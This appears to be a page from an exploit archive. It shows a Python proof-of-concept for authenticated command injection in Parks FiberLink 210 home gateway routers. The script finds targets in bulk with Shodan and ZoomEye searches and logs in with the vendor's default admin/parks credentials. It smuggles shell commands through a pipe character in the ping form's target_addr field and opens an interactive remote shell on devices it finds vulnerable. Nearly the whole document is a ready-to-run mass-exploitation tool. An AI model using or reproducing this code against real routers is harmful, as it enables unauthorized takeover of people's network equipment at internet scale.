4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import os
import sys
import requests
import argparse
import urllib.parse
from shodan import Shodan
from rich.table import Table
from zoomeye.sdk import ZoomEye
from rich.console import Console
from rich.progress import Progress
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed


class Exploiter:
    def __init__(self, args):
        self.args = args
        self.output = args.output if args.output else 'vulnerable.txt'
        self.console = Console()
        self.CMD = 'echo "VULNERABLE"'
        self.shodan = Shodan(os.environ.get("SHODAN_API_KEY")) if args.shodan else None
        self.zoomeye = ZoomEye(api_key=os.environ.get("ZOOMEYE_API_KEY")) if args.zoomeye else None
        self.targets = []
        self.vulnerable_hosts = []
        self.exploitation_results = {}
        self.executor = ThreadPoolExecutor(max_workers=args.threads)

    def run(self):
        if self.args.shodan:
            self.generate_targets_shodan()
        if self.args.zoomeye:    
            self.generate_targets_zoomeye()
        if self.args.target:
            self.targets.append(self.args.target)
                
        with ThreadPoolExecutor(max_workers=self.args.threads) as executor: 
            futures = {executor.submit(self.exploit_target, target) for target in self.targets}
            for future in as_completed(futures):
                try:
                    future.result()  
                except Exception as e:
                    self.console.print(f"Error occurred: {e}")
        
        self.print_vulnerable_hosts()
    
    def print_vulnerable_hosts(self):
        table = Table(title="Vulnerable Hosts")
        table.add_column("Host", justify="right", style="cyan")
        table.add_column("Command Output", style="magenta")
        with open(self.output, "w") as f:
            for host, cmd_output in self.exploitation_results.items():
                f.write(host + '\n')
                table.add_row(host, cmd_output)
            self.console.print(table)
               
    def generate_targets_zoomeye(self):
        if self.zoomeye:
            self.console.print(f"[bold yellow]Searching with ZoomEye API on {self.args.pages} pages[/bold yellow]")
            self.zoomeye.multi_page_search('title:"Home Gateway" +banner:"login_parks.css"', page=self.args.pages, resource="host")
            services = self.zoomeye.dork_filter("ip,port")
            for service in services:
                self.targets.append(f"{service[0]}:{service[1]}")
            self.console.print(f"[bold green]Found Hosts: {len(self.targets)}[/bold green]")
        else:
            self.console.print("[bold red]Error: Zoomeye API key not found[/bold red]")
            self.console.print("To add the Zoomeye API key, export it as an environment variable:\n")
            self.console.print("export ZOOMEYE_API_KEY=Your_Zoomeye_API_Key")
            sys.exit(1)


    def generate_targets_shodan(self):
        if self.shodan:
            self.console.print(f"[bold yellow] Searching with Shodan API on {self.args.pages} page(s)...[/bold yellow]")
            for page in range(1, self.args.pages+1):
                    for service in self.shodan.search_cursor('http.title:"Home Gateway" http.html:"login_parks.css"'):
                        self.targets.append(f"{service['ip_str']}:{service['port']}")
            self.console.print(f"Found Hosts: {len(self.targets)}")    
        else:
            self.console.print("[bold red]Error: Shodan API key not found[/bold red]")
            self.console.print("To add the Shodan API key, export it as an environment variable:\n")
            self.console.print("export SHODAN_API_KEY=Your_Shodan_API_Key")
            sys.exit(1)                

    def login(self, url, username, password):
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = {'username': username, 'psd': password}
            response = requests.post(f'{url}/boaform/admin/formLogin', headers=headers, data=data, verify=False, timeout=3)
            return not ("bad password" in response.text.lower() or response.status_code == 403)
    
    def check(self, url):
            response = requests.get(f'{url}/status_device_basic_info.asp', verify=False, timeout=3)
            return not ('V2.1.15_X000' in response.text)    
    
    def trigger(self, url, interface, cmd):
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = self.create_data_string('localhost', cmd, interface)
            response = requests.post(f'{url}/boaform/admin/formPing', headers=headers, data=data, verify=False, timeout=3)
            self.console.print(f"[bold green]Command sent on {url}[/bold green]") if self.args.target else None
            cmd_output = self.get_text(response.text, 'pre')
            try:
                if "VULNERABLE" in cmd_output:
                    self.console.print(f"[bold green]{url} : {cmd_output}[/bold green]") if not self.args.target else None
                    self.vulnerable_hosts.append(url)
                    self.exploitation_results[url] = cmd_output
                    if self.args.target:
                        self.interactive(url, interface)
                else:
                    self.console.print(cmd_output) if not self.interactive else None       
            except: cmd_output = "[bold red]Error: No output![/bold red]"            
            return cmd_output
        
    def get_interface(self, url):
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = '\r\n'
            response = requests.get(f'{url}/diag_ping_admin.asp', headers=headers, data=data, verify=False, timeout=3)
            return self.get_text(response.text, 'option')
        
    def create_data_string(self, target_addr, cmd, waninf):
            template = "target_addr={target_addr}&waninf={waninf}"
            encoded_target_addr = urllib.parse.quote(target_addr + '|' + cmd)
            encoded_waninf = urllib.parse.quote(waninf)
            return template.format(target_addr=encoded_target_addr, waninf=encoded_waninf)
        
    def get_text(self, html_content, tag):
            start_tag = f'<{tag}'
            end_tag = f'</{tag}>'
            start_index = html_content.find(start_tag)
            if start_index == -1:
                return None
            start_index = html_content.find(">", start_index) + 1
            end_index = html_content.find(end_tag, start_index)
            if end_index == -1:
                return None
            return html_content[start_index:end_index].strip()         
            
    def interactive(self, url, interface):
            session = PromptSession(history=InMemoryHistory())
            self.interactive = True
            while True:
                try:
                    cmd = session.prompt(HTML('<ansired><b># </b></ansired>'))
                    self.CMD = cmd
                    if "exit" in cmd:
                        raise KeyboardInterrupt
                    elif not cmd:
                        continue
                    elif "clear" in cmd:
                        if os.name == 'posix':
                            os.system('clear')
                        elif os.name == 'nt':
                            os.system('cls')
                    else:        
                        result = self.trigger(url, interface, cmd)
                        self.console.print(result)
                except KeyboardInterrupt:
                    self.console.print("[bold yellow][!] Exiting shell...[/bold yellow]")
                    break
                    
    def exploit_target(self, target):
        for protocol in ['https://', 'http://']:
            url = f"{protocol}{target}" 
            try:
                if not self.login(url, self.args.user, self.args.password):
                    self.console.print(f"[red]Wrong credentials for {target}![/red]") if self.args.target else None
                    return
                
                if not self.check(url):
                    self.console.print(f"[red]{target} is not vulnerable![/red]") if self.args.target else None
                    return  
                self.console.print(f"[green]Successfully authenticated on {target}[/green]") 
                
                interface = self.get_interface(url)
                if interface is None:
                    self.console.print(f"[red]No valid interfaces for {target}![/red]") if self.args.target else None
                    return
                self.console.print(f"[green]Using {interface} interface on {target}[/green]") if self.args.target else None
                
                self.trigger(url, interface, self.CMD)   
            except Exception as e:
                self.console.print(f"[red]Error connecting to {target}: {e}[/red]") if self.args.target else None

    

def parse_arguments():
    parser = argparse.ArgumentParser(description='Authenticated Command Injection for Parks FiberLink 210')
    parser.add_argument("--shodan", action="store_true", help="Shodan API key")
    parser.add_argument("--zoomeye", action="store_true", help="ZoomEye API key")
    parser.add_argument('--target', help='Specify a single target URL')
    parser.add_argument("--threads", default=100, type=int, help="Number of threads (default: 10)")
    parser.add_argument("--pages", default=1, type=int, help="Number of pages to search in (ZoomEye or Shodan) (default: 1)")
    parser.add_argument("--user", default="admin", help="Username (default: admin)")
    parser.add_argument("--password", default="parks", help="Password (default: parks)")
    parser.add_argument("--output", help="Output file: default: 'vulnerable.txt'")
    return parser.parse_args()

def main():
    args = parse_arguments()
    exploiter = Exploiter(args)
    exploiter.run()

if __name__ == '__main__':
    main()